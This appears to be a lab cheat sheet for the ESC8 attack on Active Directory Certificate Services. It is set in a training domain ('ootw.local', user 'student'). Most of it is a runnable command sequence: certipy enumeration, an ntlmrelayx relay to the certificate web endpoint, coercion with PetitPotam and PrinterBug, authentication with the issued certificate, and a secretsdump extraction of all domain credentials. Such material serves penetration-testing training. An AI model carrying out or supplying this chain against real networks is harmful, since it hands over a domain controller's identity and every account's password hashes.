ESC8 abuses ADCS HTTP enrollment endpoints that accept relayed NTLM authentication. We coerce a target to authenticate to us, relay that authentication to the ADCS web endpoint, and request a certificate as the relayed principal.
Conditions
ADCS web enrollment endpoint is enabled.
Endpoint is reachable over HTTP or HTTPS without effective channel binding protection.
Target principal can enroll in the selected template.
We can coerce or capture NTLM authentication.
Find web enrollment
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -enabled -stdout
curl -I http://ca.ootw.local/certsrv/
Start relay for a domain controller certificate
ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
Coerce machine authentication with PetitPotam
PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200
Coerce with PrinterBug
printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100
Authenticate with issued PFX
certipy auth -pfx dc01.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=dc01.ccache
klist
Use a DC certificate path
secretsdump.py -k -no-pass ootw.local/dc01\\$@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc
Windows/C2-style relay setup markers
Free or forward TCP 445 on the relay host.
Forward incoming SMB to ntlmrelayx.
Start SOCKS if the ADCS endpoint is only reachable through the target network.
Coerce the target computer to authenticate to the relay listener.
Notes
For computer accounts, request a machine-authentication template such as DomainController or Machine depending on what the relayed account can enroll in. For user accounts, use a user-authentication template.
ESC8 is a relay attack. The certificate is the post-relay credential, and it can outlive the captured NTLM exchange.